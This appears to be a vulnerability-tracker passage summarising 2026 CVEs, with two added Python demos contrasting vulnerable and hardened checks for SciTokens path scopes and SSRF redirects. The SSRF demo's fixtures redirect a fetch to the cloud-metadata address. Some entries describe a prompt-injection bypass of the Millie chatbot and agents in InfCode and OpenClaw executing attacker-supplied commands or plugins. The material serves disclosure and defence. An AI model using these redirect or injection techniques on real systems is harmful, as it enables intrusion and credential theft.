CVSS 7.7
Server-Side Request Forgery (SSRF) in FastGPT's Model Context Protocol (MCP) tools endpoints allows authenticated attackers to probe internal networks, access cloud metadata services (e.g., AWS/GCP instance credentials), and interact with backend databases like MongoDB and Redis. Affects FastGPT versions prior to 4.14.9.5. The vulnerability has CVSS 7.7 (High) with scope change indicating potential lateral movement to other system components. EPSS data not available; no confirmed active exploitation (not in CISA KEV). Public exploit code exists via GitHub security advisory GHSA-x9vj-5m4j-9mfv with technical details and proof-of-concept guidance.
SSRF
Redis
-
CVE-2026-34155
HIGH
CVSS 7.2
Integer overflow in RAUC versions prior to 1.15.2 allows signature bypass on 'plain' format bundles exceeding 2 GiB payload size, enabling attackers with bundle modification capability to alter unverified payload portions while retaining a valid signature. This affects embedded Linux systems relying on RAUC for secure firmware updates.
Integer Overflow
-
CVE-2026-34054
HIGH
CVSS 7.8
Local privilege escalation via hardcoded build path in vcpkg's OpenSSL binaries affects Windows users of the C/C++ package manager prior to version 3.6.1#3. The vulnerability allows authenticated local attackers with low privileges to achieve high confidentiality, integrity, and availability impact (CVSS 7.8) by exploiting the hardcoded openssldir path that references the original build machine. Upstream fix available (PR #50518, commit 5111afd); patched version 3.6.1#3 released. No public exploit identified at time of analysis, with EPSS data not available for this recent CVE.
OpenSSL
Microsoft
Information Disclosure
-
CVE-2026-33581
HIGH
CVSS 7.1
OpenClaw before version 2026.3.24 contains a sandbox bypass vulnerability in its message tool that allows local attackers to read arbitrary files by manipulating mediaUrl and fileUrl alias parameters to circumvent localRoots validation. The vulnerability exploits improper input sanitization in file request routing, enabling unauthorized disclosure of sensitive files outside the intended sandbox directory without requiring authentication or user interaction.
Path Traversal
-
CVE-2026-33577
HIGH
CVSS 8.6
Privilege escalation in OpenClaw versions prior to 2026.3.28 enables unauthenticated remote attackers to approve node pairings with unauthorized elevated scopes, bypassing authorization controls through missing callerScopes validation in the node pairing approval mechanism. This vulnerability (CWE-863: Incorrect Authorization) allows attackers to extend privileges onto paired nodes beyond their intended authorization level. The CVSS vector is network-accessible and requires neither authentication nor user interaction; note that the description's source rates this 9.8 (Critical) while the score tracked above is 8.6. No public exploit identified at time of analysis, with EPSS data not available for this recent CVE.
Authentication Bypass
-
CVE-2026-33276
HIGH
CVSS 8.6
Stored cross-site scripting (XSS) in Checkmk 2.5.0 beta versions before 2.5.0b2 allows authenticated users with host or service creation permissions to inject malicious JavaScript that executes in the browsers of other users when they perform searches via the Unified Search feature, potentially enabling session hijacking, credential theft, or administrative account compromise.
XSS
-
CVE-2026-32982
HIGH
CVSS 8.7
Telegram bot token exposure in OpenClaw's media download error handling allows unauthenticated remote attackers to harvest sensitive API credentials through information disclosure. Versions prior to 2026.3.13 embed complete Telegram file URLs containing bot tokens in MediaFetchError exceptions, leaking credentials to application logs and error surfaces. EPSS data is unavailable, there is no CISA KEV listing and no public exploit was identified at time of analysis, though the vulnerability requires minimal technical sophistication to exploit given the network-accessible attack vector and low complexity (CVSS:3.1/AV:N/AC:L/PR:N).
Information Disclosure
-
CVE-2026-32976
HIGH
CVSS 7.1
OpenClaw before version 2026.3.11 allows authenticated users to bypass authorization restrictions and modify protected configuration on sibling accounts through channel commands, despite configWrites: false restrictions. An attacker with legitimate access to one account can execute /config set commands targeting another account's channel provider configuration, achieving unauthorized modification of settings across account boundaries. This vulnerability is neither actively exploited nor known to have public proof-of-concept code available.
Authentication Bypass
-
CVE-2026-32971
HIGH
CVSS 7.3
Command substitution in OpenClaw's node-host approval system allows authenticated attackers with low privileges to execute arbitrary local code by deceiving operators through mismatched approval displays. The system shows extracted shell payloads during approval but executes different argv commands, enabling wrapper-binary attacks where approved commands differ from executed commands. Authentication is required (PR:L) with high attack complexity (AC:H) and user interaction (UI:R). No public exploit identified at time of analysis, though the vulnerability class (CWE-451: UI Misrepresentation of Critical Information) indicates the technical mechanism is well-understood.
Information Disclosure
-
CVE-2026-32920
HIGH
CVSS 8.6
Remote code execution in OpenClaw (versions prior to 2026.3.12) enables attackers to execute arbitrary malicious code when users open compromised repositories. The vulnerability stems from automatic plugin loading from .OpenClaw/extensions/ directories without trust verification, allowing attackers to embed malicious workspace plugins in cloned Git repositories. The description's source rates this CVSS 9.8 (Critical), reflecting a network-based vector with no authentication or user interaction, while the score tracked above is 8.6. No public exploit identified at time of analysis, though the attack mechanism is straightforward for social engineering scenarios targeting developers.
RCE
-
CVE-2026-32734
HIGH
CVSS 7.1
DOM-based cross-site scripting in baserCMS tag creation functionality allows remote attackers to execute malicious JavaScript in victim browsers. Affects all baserCMS versions prior to 5.2.3. The vulnerability requires user interaction (CVSS UI:R) but needs no authentication (PR:N), enabling phishing or social engineering attacks. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch available in version 5.2.3.
XSS
-
CVE-2026-32727
HIGH
CVSS 8.1
Path traversal in SciTokens library (all versions before 1.9.7) allows authenticated attackers to bypass directory access restrictions and access unauthorized files. Attackers can inject parent-directory ('..') components into JWT scope claims to escape intended authorization boundaries, because path normalization during enforcement checks collapses them instead of rejecting them. CVSS 8.1 (High) with network attack vector and low complexity. EPSS data not available; no confirmed active exploitation (CISA KEV) identified at time of analysis, though publicly available exploit code exists via GitHub advisory and commit references.
Path Traversal
-
CVE-2026-32726
HIGH
CVSS 8.1
Authorization bypass in SciTokens C++ library (versions prior to 1.4.1) allows authenticated attackers to access unauthorized filesystem paths via flawed scope validation. The library's path-prefix matching does not enforce path-segment boundaries, enabling a token scoped to '/data/project1' to incorrectly authorize access to '/data/project10' or '/data/project1-backup'. CVSS 8.1 (High) reflects the significant confidentiality and integrity impact, though exploitation requires low-privilege authenticated access (PR:L). No public exploit identified at time of analysis, with EPSS data not available for recent CVE. Vendor-released patch available in version 1.4.1.
Authentication Bypass
-
CVE-2026-32725
HIGH
CVSS 8.3
Authorization bypass in scitokens-cpp library (all versions prior to 1.4.1) allows authenticated attackers to escape path-based scope restrictions via parent-directory traversal in token scope claims. The library incorrectly normalizes '..' components instead of rejecting them, enabling privilege escalation to access resources outside intended directories. EPSS data not provided, but the vulnerability is network-exploitable with low attack complexity (CVSS 8.3). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though the fix commit is publicly documented.
Path Traversal
-
CVE-2026-32716
HIGH
CVSS 8.1
Authorization bypass in SciTokens library (versions prior to 1.9.6) allows authenticated users with valid tokens scoped to specific paths to access unintended sibling paths through flawed prefix-matching validation logic. An attacker with a token for '/john' can access '/johnathan' or '/johnny' due to incorrect string prefix validation in the Enforcer component, enabling unauthorized data access and modification (CVSS 8.1, High integrity/confidentiality impact). No public exploit identified at time of analysis, though the vulnerability is straightforward to exploit with valid credentials (EPSS data not provided, CVSS complexity rated Low).
Authentication Bypass
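The four SciTokens entries above (CVE-2026-32727, CVE-2026-32726, CVE-2026-32725 and CVE-2026-32716) describe two flaws in one check: string-prefix matching that ignores path-segment boundaries, and normalizing '..' in a scope path instead of rejecting it. The Python below is an added illustration written for this page, not code from either SciTokens library; the function names and the scope and request paths are constructed. The vulnerable check reproduces both failures side by side with a hardened check that compares whole segments and refuses traversal components outright.

```python
import posixpath


def _segments(path: str):
    """Split an absolute POSIX path into components; None if it is not a clean absolute path."""
    if not path.startswith("/"):
        return None
    parts = [p for p in path.split("/") if p != ""]
    if any(p in (".", "..") for p in parts):
        return None  # traversal components are rejected, never normalized away
    return parts


def authorizes_vulnerable(scope_path: str, requested_path: str) -> bool:
    """Flawed check: collapse '..' with normpath, then compare as raw string prefixes.

    '/john' therefore authorizes '/johnny', '/data/project1' authorizes '/data/project10',
    and a scope of '/users/alice/../bob' quietly becomes '/users/bob'.
    """
    scope = posixpath.normpath(scope_path)
    requested = posixpath.normpath(requested_path)
    return requested.startswith(scope)


def authorizes_hardened(scope_path: str, requested_path: str) -> bool:
    """Fixed check: reject '..' on both sides and compare whole path segments."""
    scope = _segments(scope_path)
    requested = _segments(requested_path)
    if scope is None or requested is None:
        return False
    return requested[: len(scope)] == scope


# Constructed cases: (token scope path, requested path)
CASES = [
    ("/data/project1", "/data/project1/run.dat"),   # legitimate
    ("/data/project1", "/data/project10/run.dat"),  # sibling with shared prefix
    ("/john", "/johnny/private.txt"),               # sibling with shared prefix
    ("/users/alice/../bob", "/users/bob/secret"),   # '..' smuggled into the scope
    ("/", "/anything/at/all"),                      # root scope is still honoured
]


def compare_checks():
    """Return {(scope, requested): (vulnerable_result, hardened_result)} for CASES."""
    return {
        (scope, req): (authorizes_vulnerable(scope, req), authorizes_hardened(scope, req))
        for scope, req in CASES
    }


if __name__ == "__main__":
    for (scope, req), (vuln, hard) in compare_checks().items():
        print(f"{scope!r:28} {req!r:30} vulnerable={vuln!s:5} hardened={hard}")
```

The segment comparison is what the 1.9.6 and 1.4.1 fixes are described as restoring; the explicit rejection of '.' and '..' is the separate fix for 1.9.7 and 1.4.1, and it has to happen before any normalization step.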
-
CVE-2026-30940
HIGH
CVSS 7.2
Authenticated path traversal in baserCMS theme file management API (versions prior to 5.2.3) enables arbitrary file write, allowing administrators to create malicious PHP files outside the theme directory and achieve remote code execution. The vulnerability (CWE-22) requires high privileges (PR:H) but has low attack complexity (AC:L) with network access (AV:N). CVSS score of 7.2 reflects the significant impact when administrator credentials are compromised. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details in the advisory provide sufficient information for weaponization.
RCE
Path Traversal
PHP
-
CVE-2026-30309
HIGH
CVSS 7.8
InfCode's terminal auto-execution module fails to properly validate PowerShell commands due to an ineffective blacklist and lack of semantic parsing, allowing attackers to bypass command filtering through syntax obfuscation. When a user imports a specially crafted file into the IDE, the Agent executes arbitrary PowerShell commands without user confirmation, leading to remote code execution or sensitive data exfiltration. No public exploit code or active exploitation has been confirmed at time of analysis.
Command Injection
Information Disclosure
Microsoft
-
CVE-2026-30290
HIGH
CVSS 8.4
Arbitrary file overwrite in InTouch Contacts & Caller ID APP v6.38.1 allows remote attackers to overwrite critical internal files through the file import process, enabling arbitrary code execution or sensitive information exposure. Only version 6.38.1 is listed as affected; CVSS vector details, EPSS data and KEV status were not available from the original report, though the chain from file overwrite to RCE presents material risk.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30284
HIGH
CVSS 8.6
Arbitrary file overwrite in UXGROUP LLC Voice Recorder v10.0 allows remote attackers to overwrite critical internal files through the file import mechanism, enabling arbitrary code execution or sensitive information exposure. CVSS vector details, EPSS data and KEV status were not available at analysis time, so exploitation likelihood cannot be quantified from standard metrics; the flaw is publicly documented by the reporting researcher.
RCE
Information Disclosure
-
CVE-2026-30279
HIGH
CVSS 8.4
Arbitrary file overwrite in My Location Travel Timeline v11.80 by Squareapps LLC permits attackers to overwrite critical internal files through the file import process, resulting in arbitrary code execution or information disclosure. Attack vector and complexity details are not confirmed from available CVSS data, and active exploitation status is unconfirmed.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-30277
HIGH
CVSS 8.4
Arbitrary file overwrite in PDF Reader App TA/UTAX Mobile Print v3.7.2.251001 allows remote attackers to overwrite critical internal files during the file import process, potentially leading to remote code execution or unauthorized information exposure. The vulnerability affects a mobile print utility with proof-of-concept documentation available on GitHub, though CVSS vector details and vendor patch status remain unavailable at time of analysis.
Path Traversal
RCE
Information Disclosure
-
CVE-2026-29870
HIGH
CVSS 7.6
Directory traversal in agentic-context-engine up to version 0.7.1 enables arbitrary file writes through the checkpoint_dir parameter in OfflineACE.run, exploiting inadequate path normalization in the save_to_file method. Unauthenticated attackers can overwrite arbitrary files within the application process's permissions scope, potentially achieving code execution, privilege escalation, or application compromise depending on deployment context and file system layout.
Path Traversal
Privilege Escalation
RCE
-
CVE-2026-27489
HIGH
CVSS 8.7
Symlink-based path traversal in ONNX Python library allows local attackers to read arbitrary files on the host system when loading maliciously crafted ONNX models with external data. Affected users who load untrusted ONNX models from compressed archives or external sources may inadvertently expose sensitive files (/etc/passwd, environment variables via /proc/1/environ, etc.). Publicly available exploit code exists with a detailed proof-of-concept demonstrating the vulnerability. No EPSS score or CISA KEV listing available at time of analysis, suggesting exploitation is not yet widespread.
Path Traversal
Python
Redhat
Suse
-
CVE-2026-27124
HIGH
CVSS 8.2
FastMCP OAuthProxy allows authentication bypass through a Confused Deputy attack, enabling attackers to hijack victim OAuth sessions and gain unauthorized access to MCP servers. When victims who previously authorized a legitimate MCP client are tricked into opening a malicious authorization URL, the OAuthProxy fails to validate browser-bound consent, redirecting valid authorization codes to attacker-controlled clients. This affects the GitHubProvider integration and potentially all OAuth providers that skip consent prompts for previously authorized applications. No public exploit identified at time of analysis, though detailed reproduction steps are publicly documented in the GitHub security advisory.
Authentication Bypass
Microsoft
Redhat
-
CVE-2026-25726
HIGH
CVSS 8.1
Weak pseudo-random number generation in Cloudreve enables JWT forgery and complete account takeover on instances initialized before v4.10.0. Attackers can brute-force the PRNG seed (achievable in under 3 hours on consumer hardware) by obtaining administrator creation timestamps via public APIs and validating against known hashids, then forge valid JWTs for any user including administrators. No public exploit confirmed at time of analysis, though detailed attack methodology is disclosed. CVSS 8.1 (High) reflects network-accessible privilege escalation despite high attack complexity requiring cryptographic brute-forcing.
Privilege Escalation
OpenSSL
-
CVE-2026-24165
HIGH
CVSS 7.8
Deserialization of untrusted data in NVIDIA BioNeMo Framework enables local attackers to execute arbitrary code, cause denial of service, disclose sensitive information, or tamper with data when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction. EPSS data not available; no public exploit identified at time of analysis. Affects NVIDIA BioNeMo Framework, a platform for AI-driven drug discovery and biomolecular research.
Deserialization
RCE
Denial Of Service
Information Disclosure
Nvidia
-
CVE-2026-24164
HIGH
CVSS 8.8
Insecure deserialization in NVIDIA BioNeMo Framework enables remote code execution when attackers can induce users to process malicious serialized data. This vulnerability (CWE-502) affects the BioNeMo Framework with network-reachable attack surface (AV:N) and low complexity (AC:L), requiring only user interaction (UI:R) but no authentication (PR:N). The CVSS 8.8 rating reflects high impacts across confidentiality, integrity, and availability. No public exploit identified at time of analysis, though the deserialization vulnerability class is well-understood and commonly exploited. EPSS data not available for this CVE.
Deserialization
RCE
Denial Of Service
Information Disclosure
Nvidia
-
CVE-2026-24154
HIGH
CVSS 7.6
Command injection in NVIDIA Jetson Linux initrd allows physical attackers to execute arbitrary code with elevated privileges across Jetson Xavier, Orin, and Thor series devices. An attacker with physical access can inject malicious command-line arguments during boot without authentication (CVSS:3.1/AV:P/AC:L/PR:N), leading to complete system compromise including root-level code execution, denial of service, and data exfiltration. EPSS data not available; no public exploit identified at time of analysis, though the low attack complexity (AC:L) and physical-only requirement (AV:P) suggest exploitation is straightforward for adversaries with device access.
Command Injection
RCE
Denial Of Service
Information Disclosure
Nvidia
-
CVE-2026-24148
HIGH
CVSS 8.3
NVIDIA Jetson system initialization flaw allows authenticated remote attackers to exploit insecure default machine IDs, enabling cross-device information disclosure of encrypted data and tampering. Affects JetPack on Xavier and Orin series devices. CVSS 8.3 (High) with network attack vector and low complexity. EPSS data not available; no confirmed active exploitation (CISA KEV status not present). The vulnerability enables attackers with low-level privileges to compromise multiple devices sharing identical default machine identifiers, undermining cryptographic protections and system integrity across the device fleet.
Information Disclosure
Denial Of Service
Nvidia
-
CVE-2026-20915
HIGH
CVSS 8.5
Stored cross-site scripting (XSS) in Checkmk 2.5.0 beta allows authenticated users with pending change permissions to inject malicious JavaScript into the Pending Changes sidebar, executing in the browsers of other users who view that sidebar. This vulnerability affects the beta release 2.5.0 before version 2.5.0b2 and requires existing user authentication with specific permissions to exploit.
XSS
-
CVE-2026-5214
HIGH
CVSS 7.4
Stack-based buffer overflow in D-Link NAS device management interfaces allows authenticated remote attackers to execute arbitrary code with high impact across 21 product models. The vulnerability resides in the cgi_addgroup_get_group_quota_minsize function within /cgi-bin/account_mgr.cgi, exploitable via malicious Name parameter input. Public exploit code exists on GitHub, significantly lowering the technical barrier for attacks. Authentication is required (PR:L), but once authenticated, attackers achieve full confidentiality, integrity, and availability compromise. EPSS and KEV status not provided, but the combination of public POC, network accessibility (AV:N), low complexity (AC:L), and widespread device deployment represents material risk to organizations using affected D-Link NAS products.
D-Link
Buffer Overflow
Stack Overflow
-
CVE-2026-5213
HIGH
CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices allows authenticated remote attackers to achieve complete system compromise. Affects 20+ D-Link DNS and DNR series network storage products through firmware version 20260205. Publicly available exploit code exists targeting the account_mgr.cgi component, enabling remote code execution with low attack complexity once authenticated. The description's source rates this CVSS 8.8 (High) while the score tracked above is 7.4; the confirmed proof-of-concept demonstrates practical exploitability despite requiring low-privilege authentication.
D-Link
Stack Overflow
Buffer Overflow
-
CVE-2026-5212
HIGH
CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices enables authenticated remote attackers to execute arbitrary code with full system privileges. Affecting 20+ end-of-life D-Link DNS and DNR network storage models through firmware version 20260205, the flaw resides in the Webdav_Upload_File function within /cgi-bin/webdav_mgr.cgi. Publicly available exploit code exists, significantly lowering the barrier to exploitation. The CVSS vector is network-accessible, requiring only low-privilege authentication and no user interaction (rated 8.8 by the description's source versus 7.4 tracked above). Organizations using these legacy devices face immediate risk of complete confidentiality, integrity, and availability compromise.
D-Link
Stack Overflow
Buffer Overflow
-
CVE-2026-5211
HIGH
CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices enables remote code execution with high integrity impact for authenticated users. The vulnerability resides in the UPnP_AV_Server_Path_Del function within /cgi-bin/app_mgr.cgi, exploitable via manipulation of the f_dir parameter. With a network-accessible (AV:N), low-complexity (AC:L) vector, a source rating of CVSS 8.8 (High; 7.4 tracked above), and publicly available exploit code, this represents an elevated threat to approximately 20 legacy D-Link NAS models through firmware versions up to 20260205. No vendor-released patch identified at time of analysis, and many affected models appear to be end-of-life products.
D-Link
Buffer Overflow
Stack Overflow
-
CVE-2026-5204
HIGH
CVSS 7.4
Stack-based buffer overflow in Tenda CH22 router version 1.0.0.1 allows authenticated remote attackers to achieve arbitrary code execution via the webSiteId parameter in the formWebTypeLibrary function. Public exploit code exists on GitHub, significantly lowering the barrier to exploitation. While requiring low-privilege authentication (PR:L), the vulnerability enables complete compromise of router confidentiality, integrity, and availability with low attack complexity.
Tenda
Buffer Overflow
Stack Overflow
-
CVE-2026-5201
HIGH
CVSS 7.5
Heap-based buffer overflow in gdk-pixbuf JPEG loader allows unauthenticated remote attackers to trigger denial of service through specially crafted JPEG images without user interaction. The vulnerability affects Red Hat Enterprise Linux versions 6 through 10 and can be triggered automatically during thumbnail generation operations. With CVSS 7.5 (High) and network-accessible attack vector, this poses significant availability risk. No public exploit identified at time of analysis, though EPSS data not available for final risk quantification.
Heap Overflow
Denial Of Service
Buffer Overflow
-
CVE-2026-5190
HIGH
CVSS 7.7
Memory corruption leading to arbitrary code execution affects AWS C Event Stream library versions before 0.6.0 when clients process malicious event-stream messages from attacker-controlled servers. The out-of-bounds write vulnerability in the streaming decoder requires high attack complexity and user interaction (CVSS:3.1/AV:N/AC:H/PR:N/UI:R), but grants complete control over confidentiality, integrity, and availability if successfully exploited. No public exploit identified at time of analysis, with EPSS data unavailable for this 2026-dated CVE. Vendor-released patch version 0.6.0 addresses the issue.
Buffer Overflow
RCE
Memory Corruption
-
CVE-2026-5087
HIGH
CVSS 7.5
PAGI::Middleware::Session::Store::Cookie through version 0.001003 generates cryptographically weak initialization vectors (IVs) for session cookie encryption by falling back to Perl's built-in rand() function when /dev/urandom is unavailable, particularly affecting Windows systems. This predictable IV generation enables attackers to decrypt and tamper with session data stored in cookies, compromising session confidentiality and integrity. No active exploitation has been confirmed, but the vulnerability affects all deployments on systems lacking /dev/urandom access.
Information Disclosure
Microsoft
-
CVE-2026-4800
HIGH
CVSS 8.1
Remote code execution in Lodash <4.18.0 allows unauthenticated attackers to execute arbitrary JavaScript code during template compilation by injecting malicious key names into options.imports parameter. The vulnerability bypasses the CVE-2021-23337 fix by exploiting an unvalidated code path that flows into the same Function() constructor sink. With CVSS 8.1 (High) and EPSS data not provided, this represents a significant supply chain risk for applications using Lodash's template functionality with untrusted input. No public exploit confirmed at time of analysis, though the technical details in the advisory provide a clear exploitation roadmap.
Code Injection
RCE
-
CVE-2026-4400
HIGH
CVSS 7.0
Insecure Direct Object Reference (IDOR) in 1millionbot Millie chat allows unauthenticated remote attackers to access other users' private chatbot conversations by manipulating conversation IDs in API requests to 'api.1millionbot.com/api/public/conversations/'. An attacker with knowledge of a target conversation ID can retrieve sensitive or confidential data without authentication. No public exploit code or active exploitation has been independently confirmed at the time of analysis.
Authentication Bypass
-
CVE-2026-4399
HIGH
CVSS 8.7
Prompt injection in 1millionbot Millie chatbot allows remote attackers to bypass chat restrictions using Boolean logic techniques, enabling retrieval of prohibited information and execution of unintended tasks including potential abuse of OpenAI API keys. The vulnerability exploits insufficient input validation in the LLM's containment mechanisms, permitting attackers to reformulate queries in ways that trigger affirmative responses ('true') that then execute injected instructions outside the chatbot's intended scope.
Code Injection
-
CVE-2026-4020
HIGH
CVSS 7.5
Sensitive system configuration data exposure in Gravity SMTP for WordPress (all versions ≤2.1.4) allows unauthenticated remote attackers to retrieve comprehensive server information via an unsecured REST API endpoint. The /wp-json/gravitysmtp/v1/tests/mock-data endpoint lacks authentication controls, exposing ~365 KB of JSON containing PHP version, database credentials structure, WordPress configuration, plugin/theme inventories, and configured API keys/tokens. EPSS data not provided; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though the attack vector is trivial (CVSS AV:N/AC:L/PR:N).
WordPress
PHP
Information Disclosure
-
CVE-2026-3308
HIGH
CVSS 7.8
Arbitrary code execution in Artifex MuPDF 1.27.0 via integer overflow in PDF image processing. A maliciously crafted PDF triggers an integer overflow in the pdf_load_image_imp function within pdf-image.c, resulting in a heap out-of-bounds write that enables remote code execution without authentication. No public exploit code or active exploitation has been confirmed at time of analysis.
Integer Overflow
RCE
Buffer Overflow
-
CVE-2026-2123
HIGH
CVSS 8.6
Privilege escalation in OpenText Operations Agent versions 12.29 and earlier on Windows allows local attackers to execute arbitrary code by placing malicious executables in specific writeable directories, which the agent subsequently executes with elevated privileges. The vulnerability requires local access and specific conditions to be present but does not require prior authentication to the agent itself. No public exploit code has been identified, and there is no confirmation of active exploitation at time of analysis.
Microsoft
Privilege Escalation
-
CVE-2025-32957
HIGH
CVSS 8.7
Arbitrary code execution in baserCMS versions before 5.2.3 allows authenticated administrators to achieve remote code execution via malicious PHP files embedded in backup restore archives. The vulnerability exploits unsafe file inclusion during ZIP extraction in the restore function, where uploaded PHP files are executed via require_once without filename validation. No public exploit identified at time of analysis, though EPSS score of 0.00043 (0.043%) and CVSS 8.7 indicate moderate theoretical risk mitigated by high privilege requirements (PR:H).
PHP
RCE
File Upload
-
CVE-2025-14213
HIGH
CVSS 8.3
Command injection in Cato Networks Socket (versions prior to 25) enables authenticated administrators with web interface access to execute arbitrary commands as root on the underlying system. The vulnerability requires high-level privileges (CVSS PR:H) but offers complete system compromise once accessed, with network-based attack vector and low complexity. No public exploit identified at time of analysis, though the command injection class (CWE-78) is well-understood and straightforward to weaponize once administrative credentials are obtained.
Command Injection
-
CVE-2025-10559
HIGH
CVSS 7.1
Path traversal in DELMIA Factory Resource Manager (3DEXPERIENCE R2023x through R2025x) allows authenticated remote attackers to read sensitive files and write files to specific server directories. The vulnerability affects the Factory Resource Management component and requires low-privilege authentication (CVSS PR:L) with low attack complexity. EPSS data not available; no public exploit identified at time of analysis. This represents a significant data exposure risk in industrial manufacturing environments using Dassault Systèmes' 3DEXPERIENCE platform.
Path Traversal
-
CVE-2025-10553
HIGH
CVSS 8.7
Stored cross-site scripting in Dassault Systèmes DELMIA Factory Resource Manager (R2023x through R2025x) allows authenticated attackers to inject malicious scripts that execute in victims' browser sessions with changed scope impact. CVSS 8.7 severity reflects the scope change (S:C) enabling attacks beyond the vulnerable component's privileges. No public exploit code identified and not listed in CISA KEV at time of analysis, though the low attack complexity (AC:L) indicates straightforward exploitation once authenticated access is obtained.
XSS
-
CVE-2025-10551
HIGH
CVSS 8.7
Stored Cross-Site Scripting (XSS) in Dassault Systèmes ENOVIA Collaborative Industry Innovator's Document Management module enables authenticated attackers to inject malicious scripts that execute in other users' browser sessions across 3DEXPERIENCE releases R2023x through R2025x. With CVSS 8.7 (High severity) and scope change (S:C), successful exploitation allows session hijacking, credential theft, and persistent compromise of users accessing manipulated documents. EPSS data not available; no public exploit identified at time of analysis, though the low attack complexity (AC:L) makes exploitation straightforward once an attacker gains low-privilege access (PR:L).
XSS
-
CVE-2026-34887
MEDIUM
CVSS 6.5
Stored cross-site scripting (XSS) in Extend Themes Kubio AI Page Builder through version 2.7.0 allows authenticated users to inject malicious scripts that execute in the browsers of other users viewing affected pages. An attacker with user account access can inject unescaped input during page generation, leading to session hijacking, credential theft, or malware distribution. No public exploit code has been identified at the time of analysis.
XSS
-
CVE-2026-34881
MEDIUM
CVSS 5.0
Server-Side Request Forgery in OpenStack Glance image import allows authenticated users to bypass URL validation via HTTP redirects and reach internal services. Affected versions include Glance prior to 29.1.1, 30.0.0 through 30.1.0, and 31.0.0. The vulnerability impacts web-download and glance-download import methods, plus the optional ovf_process plugin. An authenticated attacker can craft a redirect chain to access restricted internal endpoints, though the CVSS vector indicates no confidentiality impact and limited integrity risk (CVSS 5.0). No public exploit code or active exploitation has been confirmed at time of analysis.
SSRF
-
CVE-2026-34740
MEDIUM
CVSS 6.5
Stored server-side request forgery (SSRF) in WWBN AVideo 26.0 and prior allows authenticated users with upload permissions to inject arbitrary URLs into the EPG (Electronic Program Guide) link feature, which the server automatically fetches on each EPG page visit. Because the requests originate from the server itself, an attacker can scan internal networks, reach cloud metadata services, and interact with internal services that a network perimeter would otherwise keep out of reach. No public exploit code identified at time of analysis.
SSRF
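The Glance entry above (a redirect chain defeating a one-time URL check) and the AVideo EPG entry (a server fetching a stored attacker URL) share the same fix: validate the destination at every hop the client will connect to, not just the URL the user submitted. The Python below is an added illustration written for this page, not Glance or AVideo code; the DNS and HTTP fixtures are constructed so it runs offline, and 34.120.10.10 is an arbitrary public-range stand-in address. The naive importer validates once and lets the HTTP client follow redirects; the hardened one follows them itself and re-validates each hop.

```python
import ipaddress
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = {301, 302, 303, 307, 308}


class SSRFBlocked(Exception):
    pass


def is_public_address(ip: str) -> bool:
    """True only for globally routable unicast; covers loopback, RFC1918, link-local (metadata) etc."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def assert_safe_url(url: str, resolve) -> None:
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise SSRFBlocked(f"unsupported or hostless URL: {url}")
    addresses = resolve(parts.hostname)
    if not addresses:
        raise SSRFBlocked(f"unresolvable host: {parts.hostname}")
    for ip in addresses:
        if not is_public_address(ip):
            raise SSRFBlocked(f"{url} resolves to non-public address {ip}")


def import_vulnerable(url: str, resolve, fetch_following_redirects) -> bytes:
    """Checks only the submitted URL; the HTTP client then follows redirects blindly."""
    assert_safe_url(url, resolve)
    return fetch_following_redirects(url)


def import_hardened(url: str, resolve, fetch_one_hop, max_redirects: int = 3) -> bytes:
    """Follows redirects itself and re-validates every hop before connecting to it."""
    for _ in range(max_redirects + 1):
        assert_safe_url(url, resolve)
        status, location, body = fetch_one_hop(url)  # client must NOT auto-follow
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return body
    raise SSRFBlocked("too many redirects")


# Constructed fixtures standing in for DNS and an HTTP client.
FAKE_DNS = {
    "images.example.org": ["34.120.10.10"],   # constructed public address
    "169.254.169.254": ["169.254.169.254"],   # cloud instance metadata endpoint
}
FAKE_HTTP = {
    "https://images.example.org/disk.qcow2": (200, None, b"constructed image bytes"),
    "https://images.example.org/redirect": (302, "http://169.254.169.254/latest/meta-data/", b""),
    "http://169.254.169.254/latest/meta-data/": (200, None, b"constructed metadata body"),
}


def fake_resolve(host: str):
    return FAKE_DNS.get(host, [])


def fake_fetch_one_hop(url: str):
    return FAKE_HTTP[url]


def fake_fetch_following_redirects(url: str) -> bytes:
    for _ in range(10):
        status, location, body = FAKE_HTTP[url]
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)
            continue
        return body
    raise RuntimeError("redirect loop")


def naive_import(url: str) -> bytes:
    return import_vulnerable(url, fake_resolve, fake_fetch_following_redirects)


def safe_import(url: str) -> bytes:
    return import_hardened(url, fake_resolve, fake_fetch_one_hop)


if __name__ == "__main__":
    print(naive_import("https://images.example.org/redirect"))  # metadata leaks
    try:
        safe_import("https://images.example.org/redirect")
    except SSRFBlocked as exc:
        print("blocked:", exc)
```

Two caveats for real deployments: the client used for fetch_one_hop must be configured not to follow redirects on its own (for example allow_redirects=False in requests), and resolving a name and then connecting by name again is a time-of-check/time-of-use gap that DNS rebinding exploits, so connect to the address you validated rather than letting the socket layer resolve a second time.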
-
CVE-2026-34739
MEDIUM
CVSS 6.1
Reflected cross-site scripting (XSS) via unencoded HTML output in WWBN AVideo's User_Location plugin testIP.php endpoint allows attackers to execute arbitrary JavaScript in admin sessions. Affecting AVideo 26.0 and earlier, the issue is made exploitable cross-origin by the SameSite=None cookie configuration, so an unauthenticated attacker who lures an admin to a malicious link can run script in the admin's authenticated context. No public exploit code or vendor patch has been released at time of analysis.
PHP
XSS
-
CVE-2026-34738
MEDIUM
CVSS 4.3
WWBN AVideo versions 26.0 and prior allow authenticated uploaders to bypass content moderation by directly setting video status to active via an unvalidated overrideStatus parameter, circumventing admin-controlled review workflows. The vulnerability affects any user with upload permissions and has a CVSS score of 4.3 (low-to-moderate severity) with no public exploit code identified at time of analysis.
Authentication Bypass
-
CVE-2026-34737
MEDIUM
CVSS 6.5
